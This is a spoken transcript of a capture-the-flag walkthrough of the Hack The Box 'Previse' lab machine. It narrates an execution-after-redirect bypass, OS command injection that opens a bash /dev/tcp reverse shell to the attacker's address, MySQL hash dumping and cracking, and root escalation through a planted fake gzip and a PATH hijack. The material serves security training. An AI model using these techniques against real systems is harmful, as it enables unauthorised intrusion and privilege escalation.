Alrighty, there we go. We are ready, rolling to start recording for Previse HTB. So this is a box I rooted about 4 months ago. It was a fun box. It teaches you a lot of stuff that you could use in the real world. And just some pretty handy techniques to get your hands on so that you can deal with other harder machines later on. So speaking of that, let's get started with our nmap scan. And we'll just run this with sudo. So we're enumerating for certain scripts, versions, the IP address. We need verbosity just so we can just see what's happening more clear. And then we're outputting it into a normal format to this directory. So, and then once that's done, we can already see we have SSH running. We can assume add HTTP, and then we can visit the website as soon as it's done and it is finished. So we can see it is running SSH, OpenSSH 7.6 P1, Ubuntu, so that's great. And then we have HTTP is open with Apache, sorry. And Apache is normally PHP, as we see. The requested resource was login.php. We see a couple methods here that we could use, and some other stuff that is not super important. We could already see the HTTP title is Previse login, so we are going to a login page, but we can see for ourselves what's going on there. So 10.129.95.185. And we have Previse file storage. So as you can see here, we see a couple things of previous stuff that I've done, not specifically for this box, but it's safe to assume that on a lot of login pages, there's a couple of things you immediately want to test for. One of those on these weaker boxes is SQL injection, just to see if you can authenticate if you just do as you see here, we have the quote to break it, or 1 = 1, and then the password doesn't really matter because it's getting commented out anyways. So basically what this is doing is in the username category, it's commenting out, so it's kind of breaking, because the normal query would be like select all from users where username is equal to, and this is where user input would be, and then it's basically looking like this. No. Oh god, let me just get that real quick. Go back to where it's like that, and then we put the quote here, or 1 = 1, and that's basically it. So it's saying select all from users where username is equal to this, which is null or nothing, or where 1 = 1, which is just true, so it authenticates us. So we can try that out here, but we get nothing. So no SQL injection here. So we can try some other attacks. Maybe there is an index.php. We get redirected immediately back to login.php. So let's just try directory brute forcing to see if some other things are open. We can go to possibly Buster dir. We want home, black, wordless, medium on HTTP, 10.129.95.185. And we can do the extension PHP or text or whatnot, but I'm just going to do PHP for now. So we can let that go, and we already see a bunch of things so far. We see download.php. These HTA stuff aren't too important. Footer, header, files, login, which is where we're at, index, and we can see it's redirecting to login.php, but there's something kind of odd happening. as we can see, login.php has a size of 2224, yet index.php isn't 2224. So, okay, kind of weird. So we can try something out here, to where if we go to index.php, let's intercept it with burp so we can see what's happening. So we can see our GET request. It's to index.php, and we can just send that to repeater real quick and see what happens. So we get a 302 found, but this doesn't look right. As we can see, our size is not how it should be, and there's even a follow redirection, but it looks as if we're at the home or index.php for the website. So, okay, let's intercept the response. So it says we're getting a 302 found, but it's clearly given us the data for index.php. So I'm just going to tell us that we are okay to view this, which we can do. And, okay, so we can view index.php, and I'm assuming we can also view what I would assume is accounts.php, files.php, and whatever else this would be. Okay, well, let's search for a method. We can try and create an account, as we can see here. None of the stuff here is too important yet, so let's just try and create an account. We can do the same method, response, and let's OK ourselves, and view what's here. So we can see a couple of things. Add a new account, we can create a user. And we could submit a couple of values here, so we can do just Isaac, password can be password, and password can be password. And we could see that we're making a post request to accounts.php with a couple of parameters, with our username being Isaac, our password being password, and the confirmation password being password. So we can submit that. And it takes us back to login.php. But we should have a login because we have submitted our accounts as an administrator, so we should have an administrative account under the username Isaac and the password as password. Well, let me just drop that. And we are here. Our username is Isaac, and we are an administrator. There was another method you could have done for this instead of 200 okaying yourself. You could have went here, and we can finish that up because we're done with that. You could curl HTTP 10.129.95 at accounts.php, and you'll get this back because this doesn't redirect you automatically. Curl is strictly on whatever URL you give it. But if we wanted to, we could just tack L and it would redirect us to the login, as we could see probably here, Previse login. So this gives us the strict data, whether there is a vulnerability here or not, of whatever we provide. So we could see here, create an account, okay. And rather than it being a GUI interface, we could try and see how to do this just through curl. Okay, only admins, gotcha, okay. So we see here, we can, with the post method on accounts.php, provide a username, a password, and a confirmation. So let's try and create a new user doing this method. So we can do techd for data with username equaling test. Let's just do Isaac2, and password equaling password, and confirm equaling password. Okay. We also have to make sure that our request is a post request, because that was what was needed in order to create the account. It's a post request on accounts.php. So we can try and create our user now. We can just submit this, and we get some data back. And we can try now to log in as Isaac2 with the password as password. So let's go back to login. We can just delete. Oh, we have no cookie. Oh, that's great. Is this the one we're authenticating? Is this the one where there should be a PHP session? Yeah, there we go. We can just trash this cookie, refresh our page, and try and log in as Isaac2. And we authenticate. We are Isaac2. So those are the two ways that you could have messed with that vulnerability, which would be an EAR vulnerability mixed in with an IDOR vulnerability. Because we'll see the source code later on to how that was giving us that data and how we were able to exploit that. So we can go here. We've already created an account as far as we can go there. Files, we see a site backup.zip. We can download that. That looks kind of interesting. Management, we have 3 registered admins, which I'm guessing one is a user we don't know of. One is Isaac and one is Isaac2. And there's one uploaded file. MySQL server is online and connected, so we know that there's SQL running to manage our passwords and so on. So there could have been the possibility for SQL injection in that login page, but there wasn't. So, okay, let's look at this site backup.zip. Move, downloads, site. Was it capital? I need a full path. Downloads, site backup.zip here, and we can just unzip this site backup. Great. That's a little messy. Let's remove everything with the extension PHP so we can move this into its own directory. Site backup, and move that site backup into site backup. And then let's go in there. Now we can unzip it so it's a little cleaner. So let's view it in the larger one here. And let me actually increase the size for you guys, because I know it was a little harder seeing for myself on my phone, so apologies for that. So let's go into site backup here. And it looks to be what would be on the front end, as we saw status.php, files.php, login, index, so on and so forth. We didn't see this file logs, and maybe that was also on the front end, and I bet we could see it if we looked hard enough. But it's not super important. So let's just look at one of these files. Maybe let's just look at accounts. And this looks to be more of backend code rather than front end. As we can see, we have that filter sanitized string. So that's why I believe the SQL injection wouldn't have worked. Of course, I'm not really sure. So this appears to be the backend for the website. So we can try just looking through the backend code to find some kind of vulnerability through their website, to hopefully gain some kind of higher access or further privilege. So we can actually see here why that vulnerability, that EAR vulnerability, which is execution after redirect, exists, because after this redirect here, as we can see, if our user or session is not set, if we don't have a PHP cookie as a certain user, then it will just redirect us to login.php. But there is no die function here, not diet. There's no die function here, so it would just go ahead and redirect us, but it would also execute everything else. So we would have access to the entire website without actually having sufficient authentication or authorization. So that's why that EAR vulnerability exists, and then the IDOR vulnerability was kind of paired with that EAR vulnerability to create administrative access or administrative accounts, because we could supply our own data in order to create our own administrative account for the website. So, okay, accounts.php doesn't look like anything would be there. File download.php, let's look at how big that is. Wait. I guess I could have just done that. Download, looks like it has some size, so let's look at download. Let me just set that. So it looks as if that EAR vulnerability is also present here, so it looks to be not just on one of them, but on all of them. Okay, interesting. But nothing super eye-popping here. We can just get rid of everything. That's cleaner. Don't care. Okay. Maybe in logs.php, we haven't seen that one yet. And this is where the vulnerability becomes present. So we see that your vulnerability is here again. And then we make a post request. If it is a post request, it redirects us. Okay, that's not super important. So I'm guessing, let's visit logs.php real quick. Where would that be? Just here. Log data? That's file logs, and I'm guessing this would be in logs. So we take security very seriously and keep logs of file access actions. We can set delimiters for your needs. If you don't know what a delimiter is, it's kind of just like something that spaces out information, I guess. It makes tables and columns look clear. Or rows and columns, I guess. So we can set a delimiter, whether it's a comment, a comma, a space, or a tab. So we can just test this out with a comma, out.log. Let's actually do this in here. Move downloads out.log here. And we can see the delimiter for this data is a comma. So we can see probably a timestamp, a user, and then some other data here. We can also see our own access to the files, probably a timestamp again or something. Our user, and then some other data. Oh, we can see here, yeah, time, user, file ID. Okay, so there were other IDs here. Something interesting you could try, but it failed for me when I first tried it, was an IDOR vulnerability to where we could download other files that a user has access, as we can see, because there are other files other than the ID 32. There's 24, 23, 25, 6, 1, 5, 4, yada, yada, yada. But of course, that didn't work out for me, so I moved on to something else. So next, we could take a bigger magnifying glass and look at this code, and we can see I tried really hard to parse the data, the log delimiters in PHP, but Python was just so much easier. And we could see into a variable, we're executing Python on this script here, with our own user input. So that's not good. We could try, and I'll show you what this would look like with our own delimiter, I'm guessing, is instead of this parameter or variable here, it would just be whether we insert a comma or a tab or space or whatnot. But for now, it's whatever we provide. And looking at this exec function executes shell script, or just shell. So we could get a reverse shell with this exec function right here, because it's an OS command injection vulnerability. They're executing system commands within a language, and we have access to the variable or the parameter in order to inject our own bash or shell to get a reverse shell. So let's do that. We can just listen netcat tech lvmp on 9001, and what we must do is we must insert our own shell script here, but we must also interrupt this one as well, and I will show you how. So on here we must intercept, we're already listening, submit. So our delim, as we can go back to here, delim, that parameter, okay, is comma. So if you don't know how to separate commands in bash, you can just, if we do ls, you can use a semicolon and it will execute both commands. You can do an ampersand, and it will execute it twice over. You can also do a pipe. That one didn't work. Double pipes also sometimes work. It just kind of depends. Double ampersands also work. So you kind of just have to test and see which one works out for you. But most of the time, the semicolon will work because that's strictly for separating commands with one, separating two commands with one command, I guess. So we can try that out. We can just use a semicolon, and we can ping ourself just to see if this will work. And we are listening on Tuno, so we can do TCP dump on Tuno, CMP. Can't parse filters, syntax. Is there really? Okay, so we need tech I for the interface, Tuno. And the type, would that be the protocol type? We can try it out. CMP? Nope. Oh, wait. Huh. Okay, interesting. So we can just listen, I guess. We can see what happens. And we can ping ourselves. And does this need to be... No. Yes, it does need to be URL encoded. So we can ping our address, which we were 10.10.14.59. And we will URL encode this. And forward it. And we can see a string or just a continuous request from 10.129.95.185 to our own interface. So we have command execution. Let's get a reverse shell. So we can go back to the website, submit another request, and I may have actually done something super bad. Possibly. Nope. Okay, we're good. So forward. Yeah, no, I may have done something super bad. Because now it's going to hang for like forever. That's not good. Yeah, I should have known that. I should have. That's okay. Yeah, because I should have set just a count. Because if we go back here, oops, I actually stopped the box because I'm redoing it real quick. But if we went back, it would just keep making that request. So we should have made the count just 1 or 5 just to see if it would be just a strict number. Because if we got the request, we got it. We know we have command execution. But we kind of screwed it up because we let it go on forever, basically. Because in Linux, the ping command goes as long as it goes unless you set a count. With tax C, you could set a count for 5, 1, 2, 3, 4, 5, and it's done. So we should have done that, but my bad. It's alright, we all make mistakes, so. We will wait patiently for the box to come back up. In the meanwhile, we can prepare our reverse shell. And we should have done something. No. Because normally you don't know if a box has bash or not. You may have to use shell or something. We're just going to make a bold assumption and say that it has bash. So we can see we're executing bash and we are using an interactive session, inputting our input and error with this dev TCP module to send the request to this remote address on this port with our output, I believe. So we can just copy all of this. We have to do our request again. Let's see if we still have it back here somewhere. Yep. Right here. 10.129.67.248 and bada bing bada boom. So we should have a user as Isaac 2. Good. So we can go back to the log data. Intercept with burp. And put in our reverse shell. Convert selection to URL encoding. And we can see if we are listening first. We are. Let's do this on this one, actually, because it's larger. And we can submit our request. And it hung. That's a good sign. And we go back. We are dub data on Previse. Great. Okay, let's stabilize our shell real quick. Let's hope and pray we have Python, in which we should, because we saw it in that shell script over here. Right here, user bin Python, as we should see when we do which Python, it should be user bin Python. Great. We can stabilize our shell real quick. As we already know, we have bash. And then we can sdi raw minus echo foreground. Okay, nicer, but I want better. It should be stty calls 173 rows 22. Much nicer. Okay. So we have a much nicer shell. We can export term equals x term just so we can now clear our screen. And let's move this down just a little bit. Nope, I meant like, not like, yeah, like that. Okay. Okay, great. So we are in the var www HTML directory, which is fairly normal. And we see all of the config files, we see PNGs and whatnot. Is there anything? Ooh, that stands out. Configs always are nice. Config.php. And we have a password for MySQL. Okay, that's nice. Let's try and use this as... What other users are there? Malware. Okay. Okay. Let's try and su as malware. Does not seem to work. Or we can do the dash. And that also seems to fail. Okay. Let's try and use MySQL then. And trust me, I am not the best with MySQL. Let's look at how to use it real quick. Is it tech help? Whoa. Okay. So, our username is root, and we already have our password. Our database is Previse. Great. So, tech P for password. I'm guessing tech U for username. Yep. And tech D for database? Yes. Tech capital D. Okay. Tech U, root, tech P, boom. Try that again. Single quotes. Enter password. Okay. I will do that again. Unknown database. What? That's not what I did. Yeah, trust me, guys, I'm no genius. Let's just do that one. Let's tech. Unknown database. What do you mean? Let's try with the equal. Let's try it here as well. Access denied for root at localhost. Let's just try and log in with the user and then supply the password. Password, no. Access denied using password, yes. Why? Let's just look it up. Log in to database MySQL command line. Okay, so we need. Wait, what? Why is telling me lies? Apparently, tech P is for the database name. That's why it was throwing us that error. But it's not throwing us the error when... I definitely need to get better with MySQL. MySQL tag H, so the host name. Do I need a space? I guess. Tech U for username. We are root, yes. And tech P for the database name. Let's go back up. What else do we have here? Host is localhost. That's wonderful. Tech P for the database name. Previse. Wonderful. Okay. That's definitely kind of weird. Show tables? No, we have to... Oh, yeah, we already selected the database, so... Okay. So we're showing our tables. We can select accounts, I believe. No? Select all from accounts. Yay! Wonderful. Okay. So we have two hashes, one being ours and one being malware's. Okay. Let's crack this hash then. On the beast. Well, wrong password. Oh, good God. There we go. Okay. So let's just go into brute force. Let's remove that hash.txt. I don't know what that one is. I don't want to look. So let's just echo. No. Into hash.txt because that's what we're cracking. And then we can use hashcat. We can actually name that hash if we wanted to, although it looks like MD5 crypt, I believe. On a file. No hash is found. Okay, that's fine. You can do hashcat help. And we could see the mode for MD5 crypt. We could probably just grep it. Nope, 500. Okay, yeah. As we see, it has that $, or the $1 $. So we can do mode 500 A0 on hash.txt. I also need to provide a word list. rocku.txt, not rockout, rocku.txt. I'm forgetting how to use rocku. I need an equal sign? I don't feel like it never did. No. It's working. I just need to actually... Am I being not right? Workload profile. Okay, I was definitely not using the right one. Hashcat word list. No. God, what was that? Sorry if that scared any else. Okay, so M for the mode, A for the attack mode, which I put 0 already. Hashcut also uses blah blah blah. Yes, I know. Oh. Wait. What? You don't need to specify a... What? No way. What? Why would they do that? That's... I feel like I don't remember that, but okay. Interesting, but we'll let it crack. File name. Yeah. Weird. Okay, cool. And it got cracked. Sweet. I was right about the MD5 crypt. As we can see, if we go up a little bit, it is I love Cody 112235. Great. So we can exit. I don't know. Actually, exit MySQL. See. Control Z. There we go. That didn't really stop it, but okay. Let's try and be the malware user with that password. Hey, sweet. Okay. First things first. I would really like a not black. I would like a nicer shell. I feel like that's always something I aim for. So let's just see. And there's cat user.text. We are user now. Does he have... Okay, no SSH for him. If we even just tried to, it's not there. So he doesn't have a key. A little disappointing, but not the end of the world. So we do have his password, so let's see what we can do with sudo. We can run accessbackup.sh with sudo. Okay. And it looks like it's a custom script because it's not in any bin directory. It's not compiled at all. It probably could be a cron tab or something. So let's just cat access backup.sh and see what's happening. Excuse me. So it's just a shell script. They're storing logs for something. Yeah, this is configured to run with cron, added to sudo so I can run as needed. We'll fix it later when there's time, which was their downfall. So we can see we're running gzip, which is a binary. Gzip, bin gzip. So if we just made our own, and it was just a shell script that was a reverse shell. I don't believe that port's open anymore. So if we just made our own gzip with malicious code inside and it got executed, then we would be able to get root because we can run this file and everything in here as root. So let's try it out. Change directory into something we control, and let's just touch gzip. Okay. Echo. Bin. Let's just do a full path. Bash. Tech C. No. Bin. Bash. Tech I at and dev tcp 10.10.14.59, I believe. Also, we don't need you anymore. Thank you very much. Yep. On 9001, 0 at and 1. I believe that's it. Into gzip. Cat gzip. Great. Okay, so now because it's looking for gzip in the bin gzip, we should change our path variable a little bit so that rather than it looking in bin gzip, or just bin technically, it would look in this temp directory first. So let's change our variable export path equals to /temp, and then the rest of the variable that we already have. So now it will look like temp is in front here, and then the rest of it. So it looks left to right with this path variable. And I'm sure Windows does the same thing, to where with the path variable, the system will look from left to right executing a binary or a command, rather than right to left. So if we look at it now, it's now temp, user local sbin, user local yada yada yada, but bin's over here. So now if we do which gzip, it will now look in temp first. Maybe I lied. I wanted a whole tangent to fail. It's okay. But anywho, it's in the temp directory. And I think it's finding the bin gzip one first just because of... Okay. Interesting. I'm not exactly sure why it's going to bin rather than temp. I bet restarting the box would work, but I'm not going to do that. No thanks. But we do know that even though which is failing us here, the path variable still looks from left to right. It just does. That's how the kernel works, I guess, or the system, or whatever. So we still have control over opt scripts, and just now executing it should give us root. Sorry. Sudo access backup.sh. Wait, am I doing something wrong? I feel like I am doing something wrong. Yeah. Did I do my shell wrong? Bash tech c bash tech I and dev tcp 10.10.14.59 9001 and 1 into temp gzip. Bash tech c bash tech I and dev tcp 10.14.59 9001 0 and 1. Let's try it again. No? What am I doing wrong? We should... Yeah, I'm not smart at all. I know. Oh my god. Yes, if you want it to be executed, you have to make it executable. Sudo. Now, for the moment you've all been waiting for, we are... Yes, it's the stupid stuff you mess up on. We are now root. We have access to the root directory because we are root. And there is root.txt. So there you go. That is Previse for you. Thank you very much. I hope you learned something. And yeah, that's all I have. See you.